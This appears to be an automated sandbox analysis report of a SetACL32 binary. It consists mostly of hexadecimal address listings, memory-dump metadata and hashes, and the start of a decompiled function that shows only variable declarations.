              0x012c0b5a
              0x012c0b5a
              0x012c063f
              0x012c063f
              0x012c0642
              0x012c0649
              0x012c064b
              0x012c0651
              0x012c0667
              0x012c0667
              0x012c0669
              0x012c066e
              0x00000000
              0x012c0653
              0x012c0653
              0x012c0656
              0x012c065e
              0x012c0661
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c0661
              0x012c0651
              0x012c05ed
              0x012c05ed
              0x012c05f0
              0x012c05f7
              0x012c05f9
              0x012c05ff
              0x012c0615
              0x012c0615
              0x012c0617
              0x012c061c
              0x00000000
              0x012c0601
              0x012c0601
              0x012c0604
              0x012c060c
              0x012c060f
              0x012c0b5d
              0x012c0b5d
              0x012c0b62
              0x012c0b62
              0x012c0b67
              0x012c0b67
              0x012c0b6c
              0x012c0b6d
              0x012c0b6e
              0x012c0b6f
              0x012c0b70
              0x012c0b71
              0x012c0b73
              0x012c0b75
              0x012c0b80
              0x012c0b81
              0x012c0b84
              0x012c0b85
              0x012c0b86
              0x012c0b87
              0x012c0b8e
              0x012c0b92
              0x012c0b98
              0x012c0b9a
              0x012c0b9d
              0x012c0ba0
              0x012c0ba7
              0x012c0bab
              0x012c0cc4
              0x012c0cc4
              0x012c0bb1
              0x012c0bb1
              0x012c0bb5
              0x00000000
              0x012c0bbb
              0x012c0bbb
              0x012c0bbe
              0x012c0bc5
              0x012c0bc7
              0x012c0bec
              0x012c0bec
              0x012c0bef
              0x012c0bf1
              0x012c0c16
              0x012c0c16
              0x012c0c18
              0x012c0c3f
              0x012c0c3f
              0x012c0c41
              0x012c0c65
              0x012c0c74
              0x012c0c76
              0x012c0c79
              0x012c0c7e
              0x012c0c81
              0x012c0c8c
              0x012c0c8e
              0x012c0c90
              0x012c0ca8
              0x012c0cae
              0x012c0cb8
              0x012c0cbd
              0x012c0cc0
              0x012c0c92
              0x012c0c98
              0x012c0c9b
              0x012c0c9b
              0x012c0c43
              0x012c0c4b
              0x012c0c51
              0x012c0c53
              0x00000000
              0x012c0c55
              0x012c0c5b
              0x012c0c5e
              0x012c0c5e
              0x012c0c53
              0x012c0c1a
              0x012c0c22
              0x012c0c28
              0x012c0c2a
              0x00000000
              0x012c0c2c
              0x012c0c32
              0x012c0c35
              0x012c0c35
              0x012c0c2a
              0x012c0bf3
              0x012c0bf9
              0x012c0bff
              0x012c0c01
              0x00000000
              0x012c0c03
              0x012c0c09
              0x012c0c0c
              0x012c0c0c
              0x012c0c01
              0x012c0bc9
              0x012c0bcf
              0x012c0bd5
              0x012c0bd7
              0x00000000
              0x012c0bd9
              0x012c0bdf
              0x012c0be2
              0x012c0be2
              0x012c0bd7
              0x012c0bc7
              0x012c0bb5
              0x012c0cc9
              0x012c0ccc
              0x012c0ccf
              0x012c0cff
              0x012c0d01
              0x012c0d08
              0x012c0d0c
              0x012c0d0f
              0x012c0d16
              0x012c0d18
              0x012c0d1b
              0x012c0d20
              0x012c0d23
              0x012c0d23
              0x012c0d2a
              0x012c0d2d
              0x012c0d2f
              0x012c0d32
              0x012c0d37
              0x012c0d3f
              0x012c0d4d
              0x012c0cd1
              0x012c0cd1
              0x012c0cd4
              0x012c0cdb
              0x012c0cdd
              0x012c0ce3
              0x012c0cf5
              0x012c0cf5
              0x012c0cf7
              0x012c0cfc
              0x00000000
              0x012c0ce5
              0x012c0ce5
              0x012c0ce8
              0x012c0cf0
              0x012c0cf3
              0x012c0d50
              0x012c0d55
              0x012c0d56
              0x012c0d57
              0x012c0d58
              0x012c0d59
              0x012c0d5a
              0x012c0d5b
              0x012c0d5c
              0x012c0d5d
              0x012c0d5e
              0x012c0d5f
              0x012c0d60
              0x012c0d61
              0x012c0d69
              0x012c0d6c
              0x012c0d70
              0x012c0d74
              0x012c0d76
              0x012c0d78
              0x012c0d83
              0x012c0d84
              0x012c0d85
              0x012c0d8b
              0x012c0d90
              0x012c0d92
              0x012c0d95
              0x012c0d96
              0x012c0d97
              0x012c0d9b
              0x012c0da1
              0x012c0da3
              0x012c0da9
              0x012c0dac
              0x012c0daf
              0x012c0db9
              0x012c0dc3
              0x012c0dcb
              0x012c0dd5
              0x012c0ddf
              0x012c0de2
              0x012c0df0
              0x012c0df3
              0x012c1d63
              0x00000000
              0x012c0df9
              0x012c0df9
              0x012c0dfc
              0x00000000
              0x012c0dfc
              0x012c0de4
              0x012c0de4
              0x012c0de7
              0x012c0e03
              0x012c0e03
              0x012c0e09
              0x012c0e0b
              0x012c0e20
              0x012c0e26
              0x012c0e28
              0x012c0e3d
              0x012c0e43
              0x012c0e45
              0x012c0e4b
              0x012c0e51
              0x012c0e53
              0x012c1d5b
              0x012c1d5b
              0x00000000
              0x012c0e60
              0x012c0e60
              0x012c0e69
              0x012c0e6f
              0x012c0e71
              0x00000000
              0x00000000
              0x012c0e73
              0x012c0e75
              0x012c0e7b
              0x012c0e84
              0x012c0e84
              0x012c0e87
              0x012c1d45
              0x012c1d45
              0x00000000
              0x012c0e8d
              0x012c0e94
              0x012c0e96
              0x012c0e98
              0x012c0f01
              0x012c0e9a
              0x012c0e9a
              0x012c0ea0
              0x012c0ea2
              0x012c0ea5
              0x012c0eaa
              0x012c0ead
              0x012c0ead
              0x012c0eb8
              0x012c0eba
              0x012c0ebc
              0x012c0ef7
              0x012c0ef7
              0x012c0ef7
              0x012c0ebe
              0x012c0ebf
              0x012c0ec5
              0x012c0ec7
              0x012c0ec8
              0x012c0ed3
              0x012c0ed5
              0x012c0ed8
              0x012c0eda
              0x00000000
              0x012c0edc
              0x012c0ee4
              0x012c0eea
              0x012c0eec
              0x012c0eef
              0x012c0ef4
              0x00000000
              0x012c0ef4
              0x012c0eec
              0x012c0eda
              0x012c0ef9
              0x012c0ef9
              0x012c0f07
              0x012c0f09
              0x00000000
              0x012c0f0f
              0x012c0f10
              0x012c0f16
              0x012c0f18
              0x012c1d3f
              0x00000000
              0x012c0f1e
              0x012c0f1e
              0x012c0f24
              0x012c0f28
              0x012c0f7a
              0x012c0f81
              0x012c0f88
              0x012c0f8f
              0x012c0f93
              0x012c0f96
              0x012c0f99
              0x012c0fa0
              0x012c0fa4
              0x012c0fb0
              0x012c0fb7
              0x012c0fcd
              0x012c0fd2
              0x012c0fd5
              0x012c0fdb
              0x012c0fdd
              0x012c10a0
              0x012c10a6
              0x012c10a9
              0x012c1b46
              0x012c1b46
              0x012c1b4a
              0x012c1b4d
              0x012c1b50
              0x012c1b84
              0x012c1b84
              0x012c1b88
              0x012c1b8b
              0x012c1b8e
              0x012c1bc2
              0x012c1bc4
              0x012c1bcb
              0x012c1bcf
              0x012c1bd5
              0x012c1bdc
              0x012c1be3
              0x012c1be5
              0x012c1bec
              0x012c1bf1
              0x012c1bf4
              0x012c1bf4
              0x00000000
              0x012c1b90
              0x012c1b90
              0x012c1b93
              0x012c1b9a
              0x012c1b9c
              0x012c1ba2
              0x012c1bb8
              0x012c1bb8
              0x012c1bba
              0x012c1bbf
              0x00000000
              0x012c1ba4
              0x012c1ba4
              0x012c1ba7
              0x012c1baf
              0x012c1bb2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1bb2
              0x012c1ba2
              0x012c1b52
              0x012c1b52
              0x012c1b55
              0x012c1b5c
              0x012c1b5e
              0x012c1b64
              0x012c1b7a
              0x012c1b7a
              0x012c1b7c
              0x012c1b81
              0x00000000
              0x012c1b66
              0x012c1b66
              0x012c1b69
              0x012c1b71
              0x012c1b74
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1b74
              0x012c1b64
              0x012c10af
              0x012c10af
              0x012c10b2
              0x00000000
              0x012c10b8
              0x012c10b8
              0x012c10bb
              0x00000000
              0x012c10c1
              0x012c10c1
              0x012c10c5
              0x012c1a89
              0x012c1a89
              0x012c1a8d
              0x012c1a90
              0x012c1a93
              0x012c1ac7
              0x012c1ac7
              0x012c1acb
              0x012c1ace
              0x012c1ad1
              0x012c1b05
              0x012c1b07
              0x012c1b0e
              0x012c1b12
              0x012c1b18
              0x012c1b1f
              0x012c1b26
              0x012c1b28
              0x012c1b2f
              0x012c1b34
              0x012c1b37
              0x012c1b37
              0x00000000
              0x012c1ad3
              0x012c1ad3
              0x012c1ad6
              0x012c1add
              0x012c1adf
              0x012c1ae5
              0x012c1afb
              0x012c1afb
              0x012c1afd
              0x012c1b02
              0x00000000
              0x012c1ae7
              0x012c1ae7
              0x012c1aea
              0x012c1af2
              0x012c1af5
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1af5
              0x012c1ae5
              0x012c1a95
              0x012c1a95
              0x012c1a98
              0x012c1a9f
              0x012c1aa1
              0x012c1aa7
              0x012c1abd
              0x012c1abd
              0x012c1abf
              0x012c1ac4
              0x00000000
              0x012c1aa9
              0x012c1aa9
              0x012c1aac
              0x012c1ab4
              0x012c1ab7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1ab7
              0x012c1aa7
              0x012c10cb
              0x012c10cb
              0x012c10cf
              0x00000000
              0x012c10d5
              0x012c10d5
              0x012c10dd
              0x012c10df
              0x012c10ed
              0x012c10f5
              0x012c10f7
              0x012c19f4
              0x012c19f4
              0x012c19f8
              0x012c19fb
              0x012c19fe
              0x012c1a32
              0x012c1a32
              0x012c1a36
              0x012c1a39
              0x012c1a3c
              0x012c1a70
              0x012c1a72
              0x012c1a79
              0x012c1a80
              0x00000000
              0x012c1a3e
              0x012c1a3e
              0x012c1a41
              0x012c1a48
              0x012c1a4a
              0x012c1a50
              0x012c1a66
              0x012c1a66
              0x012c1a68
              0x012c1a6d
              0x00000000
              0x012c1a52
              0x012c1a52
              0x012c1a55
              0x012c1a5d
              0x012c1a60
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1a60
              0x012c1a50
              0x012c1a00
              0x012c1a00
              0x012c1a03
              0x012c1a0a
              0x012c1a0c
              0x012c1a12
              0x012c1a28
              0x012c1a28
              0x012c1a2a
              0x012c1a2f
              0x00000000
              0x012c1a14
              0x012c1a14
              0x012c1a17
              0x012c1a1f
              0x012c1a22
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1a22
              0x012c1a12
              0x012c1100
              0x012c1100
              0x012c1100
              0x012c1106
              0x012c110c
              0x012c1113
              0x012c1119
              0x012c1122
              0x012c1129
              0x012c1138
              0x012c113c
              0x012c1149
              0x012c1152
              0x012c115b
              0x012c1165
              0x012c116b
              0x012c1172
              0x012c117f
              0x012c1183
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1174
              0x012c1174
              0x012c1178
              0x012c1189
              0x012c1189
              0x012c118b
              0x012c1194
              0x012c1199
              0x012c11a5
              0x012c11a9
              0x012c11aa
              0x012c11b0
              0x012c11b5
              0x012c11b8
              0x012c11be
              0x012c11c2
              0x012c11c4
              0x012c11c6
              0x012c11ca
              0x012c11cd
              0x012c11cf
              0x012c11d1
              0x012c11d7
              0x012c11db
              0x012c11db
              0x012c11dd
              0x012c11dd
              0x012c11e3
              0x012c11e5
              0x00000000
              0x012c11eb
              0x012c11eb
              0x012c11ed
              0x012c11f4
              0x012c1943
              0x012c1949
              0x012c194b
              0x012c1c0a
              0x012c1c16
              0x012c1c1b
              0x00000000
              0x012c1951
              0x012c1951
              0x012c1951
              0x012c1951
              0x00000000
              0x012c1951
              0x012c11fa
              0x012c11fa
              0x012c1200
              0x012c1202
              0x012c1c03
              0x00000000
              0x012c1208
              0x012c120f
              0x012c1212
              0x012c1d88
              0x012c1d88
              0x00000000
              0x012c1218
              0x012c1218
              0x012c1227
              0x012c1242
              0x012c1250
              0x012c1257
              0x012c1261
              0x012c1264
              0x012c1269
              0x012c126e
              0x012c1273
              0x012c1276
              0x012c1279
              0x012c127c
              0x012c127f
              0x012c1285
              0x012c1289
              0x012c128e
              0x012c1293
              0x012c1296
              0x012c129d
              0x012c12a0
              0x012c12a4
              0x012c12aa
              0x012c12ad
              0x012c12e4
              0x012c12e4
              0x012c12f3
              0x012c12fe
              0x012c1303
              0x012c1305
              0x012c1766
              0x012c1769
              0x012c176e
              0x012c1819
              0x012c181e
              0x012c185b
              0x00000000
              0x012c1820
              0x012c182a
              0x012c183b
              0x012c1849
              0x012c184b
              0x012c184d
              0x00000000
              0x012c1853
              0x012c1853
              0x00000000
              0x012c1853
              0x012c184d
              0x012c1774
              0x012c177e
              0x012c178f
              0x012c179d
              0x012c179f
              0x012c17a1
              0x012c1861
              0x012c1861
              0x012c1867
              0x012c1869
              0x012c186c
              0x012c1871
              0x012c1871
              0x012c1874
              0x012c1878
              0x012c187b
              0x012c187e
              0x012c18b2
              0x012c18b4
              0x012c18bb
              0x012c18c2
              0x012c18c6
              0x012c18c8
              0x012c18ce
              0x012c18d1
              0x012c18d4
              0x012c18fb
              0x012c18fe
              0x012c1900
              0x012c1903
              0x012c1905
              0x012c1907
              0x012c190b
              0x012c190e
              0x012c1913
              0x012c1916
              0x012c191d
              0x012c191d
              0x012c190b
              0x012c1905
              0x012c1921
              0x012c1925
              0x012c192b
              0x012c192d
              0x012c1930
              0x012c1930
              0x012c18d6
              0x012c18d6
              0x012c18d9
              0x012c18db
              0x012c18dd
              0x012c18e1
              0x012c18e4
              0x012c18e9
              0x012c18e9
              0x012c18e1
              0x012c18ec
              0x012c18f2
              0x012c18f5
              0x012c18f5
              0x012c18d4
              0x012c1957
              0x012c1957
              0x012c195b
              0x012c1961
              0x012c1964
              0x012c199b
              0x012c199b
              0x012c199f
              0x012c19a2
              0x012c19a9
              0x012c19ac
              0x012c19e0
              0x012c19e0
              0x012c19e2
              0x012c19e9
              0x012c19f0
              0x00000000
              0x012c19ae
              0x012c19ae
              0x012c19b1
              0x012c19b8
              0x012c19ba
              0x012c19c0
              0x012c19d6
              0x012c19d6
              0x012c19d8
              0x012c19dd
              0x00000000
              0x012c19c2
              0x012c19c2
              0x012c19c5
              0x012c19cd
              0x012c19d0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c19d0
              0x012c19c0
              0x012c1966
              0x012c1966
              0x012c196c
              0x012c1973
              0x012c1975
              0x012c197b
              0x012c1991
              0x012c1991
              0x012c1993
              0x012c1998
              0x00000000
              0x012c197d
              0x012c197d
              0x012c1980
              0x012c1988
              0x012c198b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c198b
              0x012c197b
              0x012c1880
              0x012c1880
              0x012c1883
              0x012c188a
              0x012c188c
              0x012c1892
              0x012c18a8
              0x012c18a8
              0x012c18aa
              0x012c18af
              0x00000000
              0x012c1894
              0x012c1894
              0x012c1897
              0x012c189f
              0x012c18a2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c18a2
              0x012c1892
              0x012c17a7
              0x012c17a7
              0x012c17ad
              0x012c17b0
              0x012c17b6
              0x012c17b8
              0x012c17bb
              0x012c17c0
              0x012c17c0
              0x012c17c3
              0x012c17c6
              0x012c17c9
              0x012c17fd
              0x012c17ff
              0x012c1806
              0x012c180d
              0x012c1811
              0x012c1c1e
              0x012c1c1e
              0x012c1c24
              0x012c1c27
              0x012c1c5e
              0x012c1c5e
              0x012c1c61
              0x012c1c68
              0x012c1c6b
              0x012c1c9f
              0x012c1c9f
              0x012c1ca4
              0x012c1cab
              0x012c1cb2
              0x012c1cb6
              0x012c1cb9
              0x012c1ced
              0x012c1ced
              0x012c1cf0
              0x012c1cf3
              0x012c1d23
              0x012c1d23
              0x012c1d2b
              0x012c1d32
              0x012c1d39
              0x012c1d4a
              0x012c1d4a
              0x012c1d4c
              0x012c1d4f
              0x012c1d54
              0x012c1d57
              0x00000000
              0x012c1cf5
              0x012c1cf5
              0x012c1cf8
              0x012c1cff
              0x012c1d01
              0x012c1d07
              0x012c1d19
              0x012c1d19
              0x012c1d1b
              0x012c1d20
              0x00000000
              0x012c1d09
              0x012c1d09
              0x012c1d0c
              0x012c1d14
              0x012c1d17
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1d17
              0x012c1d07
              0x012c1cbb
              0x012c1cbb
              0x012c1cbe
              0x012c1cc5
              0x012c1cc7
              0x012c1ccd
              0x012c1ce3
              0x012c1ce3
              0x012c1ce5
              0x012c1cea
              0x00000000
              0x012c1ccf
              0x012c1ccf
              0x012c1cd2
              0x012c1cda
              0x012c1cdd
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1cdd
              0x012c1ccd
              0x012c1c6d
              0x012c1c6d
              0x012c1c70
              0x012c1c77
              0x012c1c79
              0x012c1c7f
              0x012c1c95
              0x012c1c95
              0x012c1c97
              0x012c1c9c
              0x00000000
              0x012c1c81
              0x012c1c81
              0x012c1c84
              0x012c1c8c
              0x012c1c8f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1c8f
              0x012c1c7f
              0x012c1c29
              0x012c1c29
              0x012c1c2f
              0x012c1c36
              0x012c1c38
              0x012c1c3e
              0x012c1c54
              0x012c1c54
              0x012c1c56
              0x012c1c5b
              0x00000000
              0x012c1c40
              0x012c1c40
              0x012c1c43
              0x012c1c4b
              0x012c1c4e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1c4e
              0x012c1c3e
              0x012c17cb
              0x012c17cb
              0x012c17ce
              0x012c17d5
              0x012c17d7
              0x012c17dd
              0x012c17f3
              0x012c17f3
              0x012c17f5
              0x012c17fa
              0x00000000
              0x012c17df
              0x012c17df
              0x012c17e2
              0x012c17ea
              0x012c17ed
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c17ed
              0x012c17dd
              0x012c17c9
              0x012c17a1
              0x012c130b
              0x012c130b
              0x012c1315
              0x012c1318
              0x00000000
              0x012c131e
              0x012c131e
              0x012c1326
              0x012c133f
              0x012c1344
              0x012c1351
              0x012c1355
              0x012c135a
              0x012c1366
              0x012c1370
              0x012c137a
              0x012c137d
              0x012c1384
              0x012c1389
              0x012c1391
              0x012c1398
              0x012c139f
              0x012c13a2
              0x012c13ac
              0x012c13b9
              0x012c13bf
              0x012c13c7
              0x012c13cc
              0x012c13d8
              0x012c13e2
              0x012c13ec
              0x012c13ef
              0x012c13f6
              0x012c13fb
              0x012c1403
              0x012c140a
              0x012c1411
              0x012c1414
              0x012c1421
              0x012c1425
              0x012c142c
              0x012c142f
              0x012c1435
              0x012c1438
              0x012c143f
              0x012c1444
              0x012c144c
              0x012c1453
              0x012c145a
              0x012c145d
              0x012c1463
              0x012c146b
              0x012c147c
              0x012c1486
              0x012c148d
              0x012c1498
              0x012c14ab
              0x012c14b0
              0x012c14b4
              0x012c14ba
              0x012c14bd
              0x012c14f4
              0x012c14f4
              0x012c14f8
              0x012c14fe
              0x012c1501
              0x012c1538
              0x012c1538
              0x012c153c
              0x012c1542
              0x012c1545
              0x012c157c
              0x012c157e
              0x012c1582
              0x012c1588
              0x012c1592
              0x012c159c
              0x012c15a3
              0x012c15a6
              0x012c15dd
              0x012c15df
              0x012c15e3
              0x012c15e9
              0x012c15f3
              0x012c15fd
              0x012c1604
              0x012c1607
              0x012c163e
              0x012c163e
              0x012c1644
              0x012c1646
              0x012c1649
              0x012c164e
              0x012c164e
              0x012c1651
              0x012c1655
              0x012c1658
              0x012c165b
              0x012c168f
              0x012c168f
              0x012c1691
              0x012c1698
              0x012c169f
              0x00000000
              0x012c165d
              0x012c165d
              0x012c1660
              0x012c1667
              0x012c1669
              0x012c166f
              0x012c1685
              0x012c1685
              0x012c1687
              0x012c168c
              0x00000000
              0x012c1671
              0x012c1671
              0x012c1674
              0x012c167c
              0x012c167f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c167f
              0x012c166f
              0x012c1609
              0x012c1609
              0x012c160f
              0x012c1616
              0x012c1618
              0x012c161e
              0x012c1634
              0x012c1634
              0x012c1636
              0x012c163b
              0x00000000
              0x012c1620
              0x012c1620
              0x012c1623
              0x012c162b
              0x012c162e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c162e
              0x012c161e
              0x012c15a8
              0x012c15a8
              0x012c15ae
              0x012c15b5
              0x012c15b7
              0x012c15bd
              0x012c15d3
              0x012c15d3
              0x012c15d5
              0x012c15da
              0x00000000
              0x012c15bf
              0x012c15bf
              0x012c15c2
              0x012c15ca
              0x012c15cd
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c15cd
              0x012c15bd
              0x012c1547
              0x012c1547
              0x012c154d
              0x012c1554
              0x012c1556
              0x012c155c
              0x012c1572
              0x012c1572
              0x012c1574
              0x012c1579
              0x00000000
              0x012c155e
              0x012c155e
              0x012c1561
              0x012c1569
              0x012c156c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c156c
              0x012c155c
              0x012c1503
              0x012c1503
              0x012c1509
              0x012c1510
              0x012c1512
              0x012c1518
              0x012c152e
              0x012c152e
              0x012c1530
              0x012c1535
              0x00000000
              0x012c151a
              0x012c151a
              0x012c151d
              0x012c1525
              0x012c1528
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1528
              0x012c1518
              0x012c14bf
              0x012c14bf
              0x012c14c5
              0x012c14cc
              0x012c14ce
              0x012c14d4
              0x012c14ea
              0x012c14ea
              0x012c14ec
              0x012c14f1
              0x00000000
              0x012c14d6
              0x012c14d6
              0x012c14d9
              0x012c14e1
              0x012c14e4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c14e4
              0x012c14d4
              0x012c14bd
              0x012c1318
              0x012c12af
              0x012c12af
              0x012c12b5
              0x012c12bc
              0x012c12be
              0x012c12c4
              0x012c12da
              0x012c12da
              0x012c12dc
              0x012c12e1
              0x00000000
              0x012c12c6
              0x012c12c6
              0x012c12c9
              0x012c12d1
              0x012c12d4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c12d4
              0x012c12c4
              0x012c12ad
              0x012c1212
              0x012c1202
              0x012c11f4
              0x012c117a
              0x012c16a3
              0x012c16a3
              0x012c16a7
              0x012c16ad
              0x012c16b0
              0x012c16e7
              0x012c16e7
              0x012c16eb
              0x012c16ee
              0x012c16f5
              0x012c16f8
              0x00000000
              0x012c16fa
              0x012c16fa
              0x012c16fd
              0x012c1704
              0x012c1706
              0x012c170c
              0x012c1722
              0x012c1722
              0x012c1724
              0x012c1729
              0x00000000
              0x012c170e
              0x012c170e
              0x012c1711
              0x012c1719
              0x012c171c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c171c
              0x012c170c
              0x012c16b2
              0x012c16b2
              0x012c16b8
              0x012c16bf
              0x012c16c1
              0x012c16c7
              0x012c16dd
              0x012c16dd
              0x012c16df
              0x012c16e4
              0x00000000
              0x012c16c9
              0x012c16c9
              0x012c16cc
              0x012c16d4
              0x012c16d7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c16d7
              0x012c16c7
              0x012c16b0
              0x012c1178
              0x00000000
              0x012c172c
              0x012c1738
              0x012c1739
              0x012c173f
              0x012c174f
              0x012c1759
              0x012c1759
              0x00000000
              0x012c1761
              0x012c10f7
              0x012c10cf
              0x012c10c5
              0x012c10bb
              0x012c10b2
              0x012c0fe3
              0x012c0fe3
              0x012c0fe7
              0x012c0fea
              0x012c0fed
              0x012c1021
              0x012c1021
              0x012c1025
              0x012c1028
              0x012c102b
              0x012c105f
              0x012c1061
              0x012c1068
              0x012c106c
              0x012c1072
              0x012c1079
              0x012c1080
              0x012c1082
              0x012c1089
              0x012c108e
              0x012c1091
              0x012c1091
              0x00000000
              0x012c102d
              0x012c102d
              0x012c1030
              0x012c1037
              0x012c1039
              0x012c103f
              0x012c1055
              0x012c1055
              0x012c1057
              0x012c105c
              0x00000000
              0x012c1041
              0x012c1041
              0x012c1044
              0x012c104c
              0x012c104f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c104f
              0x012c103f
              0x012c0fef
              0x012c0fef
              0x012c0ff2
              0x012c0ff9
              0x012c0ffb
              0x012c1001
              0x012c1017
              0x012c1017
              0x012c1019
              0x012c101e
              0x00000000
              0x012c1003
              0x012c1003
              0x012c1006
              0x012c100e
              0x012c1011
              0x012c1d8d
              0x012c1d8d
              0x012c1d92
              0x012c1d93
              0x012c1d94
              0x012c1d95
              0x012c1d96
              0x012c1d97
              0x012c1d98
              0x012c1d99
              0x012c1d9a
              0x012c1d9b
              0x012c1d9c
              0x012c1d9d
              0x012c1d9e
              0x012c1d9f
              0x012c1da0
              0x012c1dac
              0x012c1dad
              0x012c1dae
              0x012c1daf
              0x012c1db2
              0x012c1db9
              0x012c1dbd
              0x012c1dc5
              0x012c1dd0
              0x012c1dd8
              0x012c1dda
              0x012c1e59
              0x012c1e59
              0x012c1e61
              0x012c1ddc
              0x012c1ddc
              0x012c1ddc
              0x012c1dde
              0x012c1de2
              0x012c1de5
              0x012c1de7
              0x012c1deb
              0x012c1dee
              0x00000000
              0x00000000
              0x012c1df0
              0x012c1df4
              0x012c1df6
              0x012c1df7
              0x012c1dfe
              0x012c1e03
              0x012c1e05
              0x012c1e0a
              0x012c1e0a
              0x012c1e05
              0x012c1e0d
              0x012c1e11
              0x012c1e13
              0x012c1e14
              0x012c1e1b
              0x012c1e20
              0x012c1e22
              0x012c1e27
              0x012c1e27
              0x012c1e22
              0x012c1e2a
              0x012c1e36
              0x012c1e3a
              0x012c1e3d
              0x012c1e49
              0x012c1e53
              0x012c1e57
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c1e57
              0x012c1e6f
              0x012c1e6f
              0x00000000
              0x00000000
              0x00000000
              0x012c1011
              0x012c1001
              0x012c0fed
              0x012c0f2a
              0x012c0f2a
              0x012c0f2a
              0x012c0f31
              0x012c0f37
              0x012c0f39
              0x012c0f3c
              0x012c0f41
              0x012c0f44
              0x012c0f44
              0x012c0f4e
              0x012c0f54
              0x012c0f5a
              0x012c0f5b
              0x012c0f61
              0x012c0f67
              0x00000000
              0x012c0f6d
              0x012c0f6d
              0x00000000
              0x012c0f6d
              0x012c0f67
              0x012c0f28
              0x012c0f18
              0x012c0f09
              0x00000000
              0x012c0e87
              0x00000000
              0x012c0e60
              0x012c0e2a
              0x012c0e2a
              0x012c0e30
              0x012c0e33
              0x00000000
              0x012c0e33
              0x012c0e0d
              0x012c0e0d
              0x012c1d68
              0x012c1d6b
              0x012c1d73
              0x012c1d74
              0x012c1d78
              0x012c1d85
              0x012c1d85
              0x012c0e0b
              0x00000000
              0x00000000
              0x00000000
              0x012c0cf3
              0x012c0ce3
              0x00000000
              0x00000000
              0x00000000
              0x012c060f
              0x012c05ff
              0x012c05eb
              0x012c0566
              0x012c0552
              0x012c0549
              0x00000000
              0x00000000
              0x00000000
              0x012bfe80
              0x012bfe70
              0x012bfe5c
              0x012bfddb
              0x012bfdaa
              0x012bfd14
              0x012bfd14
              0x00000000
              0x012bfd14
              0x012bfd12
              0x012bfd02
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID:
              • String ID: > was not found in domain <$@Mhv$Account <$ProcessACEsOfGivenDomains
              • API String ID: 0-1665191054
              • Opcode ID: 2541809cb58498807043e943f52ca4855ddff58d1e704a2983b6c4631bec8545
              • Instruction ID: d64af10b3681e12777437ad35ce03a019e599695fa804d547d71ca92b51e5560
              • Opcode Fuzzy Hash: 2541809cb58498807043e943f52ca4855ddff58d1e704a2983b6c4631bec8545
              • Instruction Fuzzy Hash: C3F2E371A20259DBEB24CF68CC85BADBBB5FF44704F14439CE609A7281D774AA94CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C4900 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 244fileCOMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E012C4900(void* __ebx, char* __ecx, void** __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int _a20, signed int _a24, char _a28, char _a32) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed char _v60;
				signed int _v64;
				signed char _v68;
				signed int _v72;
				signed int _v76;
				short _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed char _v128;
				char _v132;
				signed int _v136;
				char _v140;
				short _v144;
				signed int _v148;
				char _v156;
				intOrPtr _v160;
				void* _v164;
				long _v168;
				char _v169;
				char _v170;
				struct _SECURITY_ATTRIBUTES* _v172;
				intOrPtr _v174;
				long _v176;
				long _v180;
				void** _v184;
				signed int _v188;
				long _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr _v356;
				signed char _v364;
				char _v372;
				signed int _v380;
				intOrPtr _v500;
				signed int _v501;
				signed int _v502;
				signed int _v504;
				char _v520;
				signed char _v532;
				intOrPtr _v533;
				signed int _v537;
				char _v540;
				signed char* _v544;
				char _v553;
				signed char _v565;
				signed int _v569;
				char _v573;
				signed int _v577;
				char _v585;
				signed char _v597;
				intOrPtr _v598;
				signed int _v602;
				char _v605;
				signed int _v609;
				char _v618;
